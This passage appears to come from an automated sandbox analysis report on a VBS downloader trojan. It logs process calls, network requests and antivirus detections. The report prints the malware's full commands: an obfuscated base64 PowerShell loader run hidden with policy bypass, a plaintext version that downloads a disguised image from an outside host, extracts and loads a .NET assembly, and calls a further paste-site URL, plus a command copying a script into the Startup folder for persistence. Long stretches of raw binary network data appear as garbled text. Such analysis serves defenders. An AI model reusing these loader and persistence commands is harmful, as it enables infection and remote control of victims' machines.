⁂FM⁂RQ⁂2⁂DQ⁂XwBT⁂FQ⁂QQBS⁂FQ⁂Pg⁂+⁂Cc⁂Ow⁂k⁂GU⁂bgBk⁂EY⁂b⁂Bh⁂Gc⁂I⁂⁂9⁂C⁂⁂Jw⁂8⁂Dw⁂QgBB⁂FM⁂RQ⁂2⁂DQ⁂XwBF⁂E4⁂R⁂⁂+⁂D4⁂Jw⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂D0⁂I⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBU⁂GU⁂e⁂B0⁂C4⁂SQBu⁂GQ⁂ZQB4⁂E8⁂Zg⁂o⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂KQ⁂7⁂CQ⁂ZQBu⁂GQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBJ⁂G4⁂Z⁂Bl⁂Hg⁂TwBm⁂Cg⁂J⁂Bl⁂G4⁂Z⁂BG⁂Gw⁂YQBn⁂Ck⁂Ow⁂k⁂HM⁂d⁂Bh⁂HI⁂d⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂Gc⁂ZQ⁂g⁂D⁂⁂I⁂⁂t⁂GE⁂bgBk⁂C⁂⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂Gc⁂d⁂⁂g⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂Cs⁂PQ⁂g⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂LgBM⁂GU⁂bgBn⁂HQ⁂a⁂⁂7⁂CQ⁂YgBh⁂HM⁂ZQ⁂2⁂DQ⁂T⁂Bl⁂G4⁂ZwB0⁂Gg⁂I⁂⁂9⁂C⁂⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Ds⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BD⁂G8⁂bQBt⁂GE⁂bgBk⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBT⁂HU⁂YgBz⁂HQ⁂cgBp⁂G4⁂Zw⁂o⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂s⁂C⁂⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BM⁂GU⁂bgBn⁂HQ⁂a⁂⁂p⁂Ds⁂J⁂Bj⁂G8⁂bQBt⁂GE⁂bgBk⁂EI⁂eQB0⁂GU⁂cw⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BD⁂G8⁂bQBt⁂GE⁂bgBk⁂Ck⁂Ow⁂k⁂Gw⁂bwBh⁂GQ⁂ZQBk⁂EE⁂cwBz⁂GU⁂bQBi⁂Gw⁂eQ⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂UgBl⁂GY⁂b⁂Bl⁂GM⁂d⁂Bp⁂G8⁂bg⁂u⁂EE⁂cwBz⁂GU⁂bQBi⁂Gw⁂eQBd⁂Do⁂OgBM⁂G8⁂YQBk⁂Cg⁂J⁂Bj⁂G8⁂bQBt⁂GE⁂bgBk⁂EI⁂eQB0⁂GU⁂cw⁂p⁂Ds⁂J⁂B0⁂Hk⁂c⁂Bl⁂C⁂⁂PQ⁂g⁂CQ⁂b⁂Bv⁂GE⁂Z⁂Bl⁂GQ⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂RgBp⁂GI⁂ZQBy⁂C4⁂S⁂Bv⁂G0⁂ZQ⁂n⁂Ck⁂Ow⁂k⁂G0⁂ZQB0⁂Gg⁂bwBk⁂C⁂⁂PQ⁂g⁂CQ⁂d⁂B5⁂H⁂⁂ZQ⁂u⁂Ec⁂ZQB0⁂E0⁂ZQB0⁂Gg⁂bwBk⁂Cg⁂JwBW⁂EE⁂SQ⁂n⁂Ck⁂Ow⁂k⁂GE⁂cgBn⁂HU⁂bQBl⁂G4⁂d⁂Bz⁂C⁂⁂PQ⁂g⁂Cw⁂K⁂⁂n⁂D⁂⁂LwBR⁂HM⁂Rg⁂1⁂Hg⁂LwBk⁂C8⁂ZQBl⁂C4⁂ZQB0⁂HM⁂YQBw⁂C8⁂Lw⁂6⁂HM⁂c⁂B0⁂HQ⁂a⁂⁂n⁂Ck⁂Ow⁂k⁂G0⁂ZQB0⁂Gg⁂bwBk⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂CQ⁂YQBy⁂Gc⁂dQBt⁂GU⁂bgB0⁂HM⁂KQ⁂=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002f4
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -command $Codigo = 'J⁂Bp⁂G0⁂YQBn⁂GU⁂VQBy⁂Gw⁂I⁂⁂9⁂C⁂⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂HM⁂ZQBy⁂HY⁂ZQBy⁂GY⁂d⁂Bw⁂C4⁂bwBu⁂Gw⁂aQBu⁂GU⁂LwBp⁂G0⁂ZwBz⁂C8⁂YgBh⁂HQ⁂XwBu⁂GE⁂d⁂Bp⁂HY⁂ZQ⁂u⁂Go⁂c⁂Bl⁂Gc⁂Jw⁂7⁂CQ⁂dwBl⁂GI⁂QwBs⁂Gk⁂ZQBu⁂HQ⁂I⁂⁂9⁂C⁂⁂TgBl⁂Hc⁂LQBP⁂GI⁂agBl⁂GM⁂d⁂⁂g⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂7⁂CQ⁂aQBt⁂GE⁂ZwBl⁂EI⁂eQB0⁂GU⁂cw⁂g⁂D0⁂I⁂⁂k⁂Hc⁂ZQBi⁂EM⁂b⁂Bp⁂GU⁂bgB0⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂EQ⁂YQB0⁂GE⁂K⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBV⁂HI⁂b⁂⁂p⁂Ds⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂EU⁂bgBj⁂G8⁂Z⁂Bp⁂G4⁂ZwBd⁂Do⁂OgBV⁂FQ⁂Rg⁂4⁂C4⁂RwBl⁂HQ⁂UwB0⁂HI⁂aQBu⁂Gc⁂K⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBC⁂Hk⁂d⁂Bl⁂HM⁂KQ⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂I⁂⁂9⁂C⁂⁂Jw⁂8⁂Dw⁂QgBB⁂FM⁂RQ⁂2⁂DQ⁂XwBT⁂FQ⁂QQBS⁂FQ⁂Pg⁂+⁂Cc⁂Ow⁂k⁂GU⁂bgBk⁂EY⁂b⁂Bh⁂Gc⁂I⁂⁂9⁂C⁂⁂Jw⁂8⁂Dw⁂QgBB⁂FM⁂RQ⁂2⁂DQ⁂XwBF⁂E4⁂R⁂⁂+⁂D4⁂Jw⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂D0⁂I⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBU⁂GU⁂e⁂B0⁂C4⁂SQBu⁂GQ⁂ZQB4⁂E8⁂Zg⁂o⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂KQ⁂7⁂CQ⁂ZQBu⁂GQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBJ⁂G4⁂Z⁂Bl⁂Hg⁂TwBm⁂Cg⁂J⁂Bl⁂G4⁂Z⁂BG⁂Gw⁂YQBn⁂Ck⁂Ow⁂k⁂HM⁂d⁂Bh⁂HI⁂d⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂Gc⁂ZQ⁂g⁂D⁂⁂I⁂⁂t⁂GE⁂bgBk⁂C⁂⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂Gc⁂d⁂⁂g⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂Cs⁂PQ⁂g⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂LgBM⁂GU⁂bgBn⁂HQ⁂a⁂⁂7⁂CQ⁂YgBh⁂HM⁂ZQ⁂2⁂DQ⁂T⁂Bl⁂G4⁂ZwB0⁂Gg⁂I⁂⁂9⁂C⁂⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Ds⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BD⁂G8⁂bQBt⁂GE⁂bgBk⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBT⁂HU⁂YgBz⁂HQ⁂cgBp⁂G4⁂Zw⁂o⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂s⁂C⁂⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BM⁂GU⁂bgBn⁂HQ⁂a⁂⁂p⁂Ds⁂J⁂Bj⁂G8⁂bQBt⁂GE⁂bgBk⁂EI⁂eQB0⁂GU⁂cw⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BD⁂G8⁂bQBt⁂GE⁂bgBk⁂Ck⁂Ow⁂k⁂Gw⁂bwBh⁂GQ⁂ZQBk⁂EE⁂cwBz⁂GU⁂bQBi⁂Gw⁂eQ⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂UgBl⁂GY⁂b⁂Bl⁂GM⁂d⁂Bp⁂G8⁂bg⁂u⁂EE⁂cwBz⁂GU⁂bQBi⁂Gw⁂eQBd⁂Do⁂OgBM⁂G8⁂YQBk⁂Cg⁂J⁂Bj⁂G8⁂bQBt⁂GE⁂bgBk⁂EI⁂eQB0⁂GU⁂cw⁂p⁂Ds⁂J⁂B0⁂Hk⁂c⁂Bl⁂C⁂⁂PQ⁂g⁂CQ⁂b⁂Bv⁂GE⁂Z⁂Bl⁂GQ⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂RgBp⁂GI⁂ZQBy⁂C4⁂S⁂Bv⁂G0⁂ZQ⁂n⁂Ck⁂Ow⁂k⁂G0⁂ZQB0⁂Gg⁂bwBk⁂C⁂⁂PQ⁂g⁂CQ⁂d⁂B5⁂H⁂⁂ZQ⁂u⁂Ec⁂ZQB0⁂E0⁂ZQB0⁂Gg⁂bwBk⁂Cg⁂JwBW⁂EE⁂SQ⁂n⁂Ck⁂Ow⁂k⁂GE⁂cgBn⁂HU⁂bQBl⁂G4⁂d⁂Bz⁂C⁂⁂PQ⁂g⁂Cw⁂K⁂⁂n⁂D⁂⁂LwBR⁂HM⁂Rg⁂1⁂Hg⁂LwBk⁂C8⁂ZQBl⁂C4⁂ZQB0⁂HM⁂YQBw⁂C8⁂Lw⁂6⁂HM⁂c⁂B0⁂HQ⁂a⁂⁂n⁂Ck⁂Ow⁂k⁂G0⁂ZQB0⁂Gg⁂bwBk⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂CQ⁂YQBy⁂Gc⁂dQBt⁂GU⁂bgB0⁂HM⁂KQ⁂=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
filepath: powershell
1 1 0

CreateProcessInternalW

thread_identifier: 3052
thread_handle: 0x00000458
process_identifier: 3048
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'http://serverftp.online/imgs/bat_native.jpeg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('0/QsF5x/d/ee.etsap//:sptth');$method.Invoke($null, $arguments)"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x0000045c
1 1 0
Kaspersky HEUR:Trojan.Script.Generic
McAfee-GW-Edition VBS/Downloader.acx
McAfee VBS/Downloader.acx
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received 9;6]å- Ú ÞëW÷#E+«ÌøŽMFì°²¶+ýÌ`»uáOnH«TaÌÕ&Ó&×<q«kvâÆå®ï,âxî5v_.Y”s€rÿ‰Æk[BÇDnþ&yLJ|:ß u í9¯uíRYÛÎ}[PÚbÚOú°Û‰ëÏ"°•8½…í]F–ìG í}pgòÿx×,áWf3Ø ÍO“`©QA]œwŒt]/Çú<ÚzÇ©k&!;Xg©Î2kª”¹¦¹¶8ùùÝâµ>F×>jžñÆù.¦Ðà33Å2DÆ$9ùqßÕوÃÚ<ñØî§%Q{¬ú£Á_¼;áMEÖ¼M£â‹ŸÝÇu®Å$ððkçáRr–‹C9s^ÈìümâÑ¡”E‚n1ŽLëÇzéŒy½âÔµ<?ÇZU§Å=:ÊÛU²¥¼ŒëvFQŒg‚1øÖхÝ̹Z~ák@ðŽàm6Ú+[—·HØG±å%pǹ'9梤%iÍ5¢9OüT±ð¿.¨5íͦýÁ èr~𪅚÷ˆŒdîw~ð–™ñÖÓÅ:n¦'FʺÇrp¾Íx5Д yÜu3¼AâOx7[âpn"”Gå|ÐÄàp9æ“rˆ½«‘ôîàë? àÓ¼y ¥ÅºÝmÒÒ鉍TÆTÁF*y\õëYÆKvSåµâz7ƒüáïh<73Xhè ¬6žp+#œo9fjÑÎ= v՞‘ai™o½´6ðA—8Uô³œˆQWæHùKö¸ýŸ´_Ú÷M»“Ç2øjïI-lQ£Ýn]˜}ì•ÃtéYs;j ¢NÝOâÿŽ<7o'‹k»­JëNÔYã¿i$bJÉÀ‹ãÞ¢TÔµ/“^f}7áÿ‰dŽÎÂÒëOÕíeGÄzkÊѾ>a*¯E=›5wº±£²Øë|Kàü;µÖ|a©é0ÝÅ$ÜAºÞÄ0LbP QÆNq“ŽµªœcTVèx‡Â?ƒ–Ÿµí3Ç·Í!7n‚- ¯î×%¥Ý‚A=09ÅhÒq¸sÄôÚ'Bð·Å…‰­èqÈúŸ…¦cu£ê‹&8|–¶È*yúÔßK¤žÇÎÞ:𵮓á/†’i:}χ<?â%žóQº·iÌùö¤LI-´-œò䖭³7ÛÜíãnð¿I·±ðωgҒ[r‘½´Ë!SݎíÒ;×W´‹vŠ4¥Ejq/ûDüQøgðåLñö߆u¹e…µ%„³XÉÞ!¸`œúc¥LùŸRÓ}&Óÿh _H¼ÐŽ›j֓‰o]†íÃîÞSÉþ‚±öI­K“”·gߞ=Ó,ÿkO†â^/ ‹&ŠþkÒ¨IV269ÎBäœúP’‚±ÏyÅë±ó÷†?fŸ|Dðÿ‡5x‰Ú7xom´ËˆÌ–ñ¡ýÙÊî Ì9þušj-¤k^†ÇÇM▇¡^"xgEñOÃÍ&%Kiï6½Ìh6ÄîW-×8«ƒIݔÝô9ƒŸ´ßøfï@I²ðn¦„}’íADžSêXõãšU£{YZQÕ3Ò¼!ðóâV•y%¯Š¼Ay©K<‰ös™"Xñ»ÏAŽÔ96]­vr_5Ÿ‡Ÿþ L÷ZòÀ~Ö-ö@øûÃ8 Gn¸ª‹æÐÎW›Ócsâµ²øoàý—ÄèòGâ[äçT¿¶âÞÍò¥B9+¹‰^NJ!æÒ²Ð㵯‰ wðçÂöVwm§jP̲ݤ$ ”°@ôã­l«7îô9ù\Û>¹°]#SÓô-T·¶¾Öì­Ä–fó å¹N¸ÉûÔÉòìÃبõ?:>5éü[âíKÅZï‡u»[).]¢2[IäÅÿ—  öϵ;ßsD’Ðö ìÞ6ø^‘x‹@²´¸û?—ix$h¤¸œpœoÀïšt9nãÔç¿$­/à7Ãÿéšæ§§[둝F!ºNSí9ۻΠ*ò䍓:ù—Sêßêÿ~Ùx{ÅõœZ/…`Ӌj¶zwúLÊNá¸õÀÖ¸)ÆJ\×8Ûmìz_ÂύÓ|sð¡®x[E}6u‘â°}GîÊÊ:°žÕ×)9hid÷>Nø©âOZö¯«xwÄ:UåÞ­öw%míÂYž2:ñøšéöqqMn:w»"ý–4=/ŒM£Ý$Ú^¥¥+5܋ /¤0Îîå\u4ݝQš„®Ïªã¶µð‚îïàAi¦Â…®.nAiÉ¬#½KDÝÑç>)øµª$Pê¾Ó¢ñmæ³*G·š±<1¨åˆ'8à֓Vј4ž§¦øsâ†Ò-’Ü[l}™Z];í*$…ñ–A'ƒ‘øVj”mÌ)+«#åÿÛ/‹º÷‰¬gðTz¤Þ‰ÚÇÃåÅÂϏ™ßhÉütB1ŽÛŠÉ­OYøàßøoá_É%Ö¡vþr[_Je’GGیœóŠn—´‹¸¥îÇÝ7£MBÃ]»]Z°[+‡ aìò€æssƒQ8ÂÊ"VkÞ<ßÆß5Í;â™áïéñø‹Iœ¨—cæBÙ8*{cŽy§¨ÆȖ‘Õü ñZxªÇS·Ñï”MïšeÜw å[9õ¬a¯ÌgËÈ´7¾j^$¹Ò.ןT6W±\2!…÷$±ñµ±Û<þTìÔloN KSñ×ûRäÄcóN+²Æ…]çvìäúš`%K¸G &Õ#æ\ãuDzñҀ éÅdб9µX¨m§%OC@ꋨ^ÍqåˆD‰ÑhÛî‰ä?uEv -¼/¨øº _K4T£o›ÁFìh ÆZu–âNËM¹7–NÉ äcÌPx8  ©¢1ªœ‚dc¥Fpq@ÀnG­%¡wt  / ëMáßiښƲµ¤é6ÇVÁΠƒâv³£ø¯Åjº,2ÛÁæÜ[È~Hå'‡®ß­ei5åÍÔh²A¸yrHcØôwıKieµÕ¥Ô2@q‰ÓhÉõü1ùÒkP9tˆÉ¸àg­0$´•cŸîç=(õä¬fâ6Ú@òOz@kê^%“^𮗧¥Im–Er"‡O®zõ  Mö× #d2 ŒuéLÖÂÉ<]uG¤b"’‡UWŽAõÈéF€=ôM;U[]"fœf)D 1rGlÿ…&RÐçt?_xc\[»G+4y'ó¦I¹®êÇÅ·2j Aš@f’8nô˜†üpþi`,ÖwRâÕrÆzýhOé0\j1ÉcŽ²¨t$cû¹ïŠ.ö™âØ`ð…žŠtÈ-o’MÑ];m.OCøúPÕÀäæiõÜ·r-´Rù[™pÄõǧ½_¾[)ÞËG–"B4ʼ <nëBc*·„­-egK‰% ÐþT›W[„·ŠX¦7gP²OÀ o½2NRÔïäºhu9e¹xIUiNY}ùõ  俳“B¶µƒO+r²eîƒòãžü¹  ÂÎ\['%OzŸHº6RíŽLó¿Ëê¹ñ܎ÔÆiXjV­{öÔÓfÀód®ˆÖõ­ N±¸ò´éÒö3æ/‚:`óK¨Œ»”Š+HÑŒ‡$º¹%XvÕ`nØé-{áãv»nƒ!TFa–#¨¤1š…­æ¶›ûBÚKIˆÊ²Ãòõ©“hF>›wm§j›¥¶ ”óÃcԊ`Yño….¬Y.#”Ü$‹¼K»paêz—áïÄÏx U†[+×[rTJó™çÓÔ~.ø§Â~8Ö!NŸoÍKpåo361Óցœmµ¬:m¹H¬d¸l•üièƒb´×©$‚&åÀ¾xüsïR+™òë lɧFÙAwÇ_֞ú©¿áˏëž¹“ZmFÏĐɄU‰ZÚUÏ\žTJ[çu˜nPªHS¸: Vb ¼ÔìÂÙ¬ žÓis)t`3ò·n£ŒPÓ*iÿÙRøZí幖ÛTd$iò:cîç¨ÔŸÁ>´ñÄ¶Rß‚¿ºw]ÈÄtÓÿ¯Tþð³êAf‘ 1¶s´åˆ<ju7º…¶©xúT¶’&X€Ì7E¸tϽÂ5ü7ii ÌÖÑIKð͆<ñŠ„®jÎçÄöséö÷†Ñ™Õ¼Ö^ª:{ð¡»2’l‹ÂþÖ<=¨G×öÓéŒ7Êè¸rރßގk¡Ir³¤ñŸi­[¼O+ª¸]¬w ç&‹Ù¯©— iÖÚuÜRBöð£+-Õƒ¶>§åõÏ~ÕWÐe UEÌ×Rᷙd úƒR˜<?oipc6ÌññpHېïžp8ïTä+Øæ4¹ntÿÛZÌ"—M(c0¤Ã`üÀœsô£F “ê,…£·f¡WÜ°Oóåڤݶz ©x'ûBcªé®læU ÑZ(„t RZnJÔn·â=Kʆ«?ÚåV7cÉbÇáUaîrZ¼š®¡q¨ˆí¸1¦yQéŠJȓ¡ƒÇWécoc4f;
Data received Ùõã|Ð3›“]¿–Þ8ç–9`a³ ۏAùÐö~U¦¡5Ü(êÊs°ûÓ%š†a<F9#¸”J<¸Ð7oZiُâE¡ñ=ÛÏLcV7ŸºHÀ`F1Ú´ZL‘ÏYŒaØ24 åyõªM¼>PÛ°±o˜ñ@†Ãw$Vû° ^»½ ŒÌ1ë!làÓD²ö ßkRˆ-#ùP‡‘‰Â¨<dŸÏÏZ¢[±éÞ𥾂«)?i»ýû®0`3Çúò{UXÉ»›Lç#æÅ2Òáp‘²™lô§ê«M6RÙldûTß±&Í®–́ƒM¯g ;•Ú¤Œöª2o±­iàÑ#«l8n=jírv7­|&–ò¤Äl9ûéÏj`Ú= KðtZ…¹‚X+Éeãó¦“D]×ā֚Ž‡5¼³ +¤ž oNGr+t¹´3“êð
Data received ÁŽù˜¯ÒŸ+Z­ÌÜ ^ø…©G5½­¬kç>7y¯»`õÍi{+3(Á^ç¦jÞ/¿°³ónµ9HW-è2zÔBJúVVÜætízïQ±x”H!¹'sÌrÊsÉÈæºUK#–Iµ¹†ü$-,ÐB³àž?çNƐ¹½­%¶™&£q"趰ἑP8Ï'9ãñ¢2OsY¨Ëc Ó&µ·²Wûl
Data sent GET /imgs/bat_native.jpeg HTTP/1.1 Host: serverftp.online Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
cmdline "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\IE_NET.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ UHB.vbs')"
cmdline ping 127.0.0.1 -n 5
cmdline cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\IE_NET.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ UHB.vbs')"
Time & API Arguments Status Return Repeated

send

buffer: GET /imgs/bat_native.jpeg HTTP/1.1 Host: serverftp.online Connection: Keep-Alive
socket: 1452
sent: 86
1 86 0
parent_process wscript.exe martian_process powershell -command $Codigo = 'J⁂Bp⁂G0⁂YQBn⁂GU⁂VQBy⁂Gw⁂I⁂⁂9⁂C⁂⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂HM⁂ZQBy⁂HY⁂ZQBy⁂GY⁂d⁂Bw⁂C4⁂bwBu⁂Gw⁂aQBu⁂GU⁂LwBp⁂G0⁂ZwBz⁂C8⁂YgBh⁂HQ⁂XwBu⁂GE⁂d⁂Bp⁂HY⁂ZQ⁂u⁂Go⁂c⁂Bl⁂Gc⁂Jw⁂7⁂CQ⁂dwBl⁂GI⁂QwBs⁂Gk⁂ZQBu⁂HQ⁂I⁂⁂9⁂C⁂⁂TgBl⁂Hc⁂LQBP⁂GI⁂agBl⁂GM⁂d⁂⁂g⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂7⁂CQ⁂aQBt⁂GE⁂ZwBl⁂EI⁂eQB0⁂GU⁂cw⁂g⁂D0⁂I⁂⁂k⁂Hc⁂ZQBi⁂EM⁂b⁂Bp⁂GU⁂bgB0⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂EQ⁂YQB0⁂GE⁂K⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBV⁂HI⁂b⁂⁂p⁂Ds⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂EU⁂bgBj⁂G8⁂Z⁂Bp⁂G4⁂ZwBd⁂Do⁂OgBV⁂FQ⁂Rg⁂4⁂C4⁂RwBl⁂HQ⁂UwB0⁂HI⁂aQBu⁂Gc⁂K⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBC⁂Hk⁂d⁂Bl⁂HM⁂KQ⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂I⁂⁂9⁂C⁂⁂Jw⁂8⁂Dw⁂QgBB⁂FM⁂RQ⁂2⁂DQ⁂XwBT⁂FQ⁂QQBS⁂FQ⁂Pg⁂+⁂Cc⁂Ow⁂k⁂GU⁂bgBk⁂EY⁂b⁂Bh⁂Gc⁂I⁂⁂9⁂C⁂⁂Jw⁂8⁂Dw⁂QgBB⁂FM⁂RQ⁂2⁂DQ⁂XwBF⁂E4⁂R⁂⁂+⁂D4⁂Jw⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂D0⁂I⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBU⁂GU⁂e⁂B0⁂C4⁂SQBu⁂GQ⁂ZQB4⁂E8⁂Zg⁂o⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂KQ⁂7⁂CQ⁂ZQBu⁂GQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBJ⁂G4⁂Z⁂Bl⁂Hg⁂TwBm⁂Cg⁂J⁂Bl⁂G4⁂Z⁂BG⁂Gw⁂YQBn⁂Ck⁂Ow⁂k⁂HM⁂d⁂Bh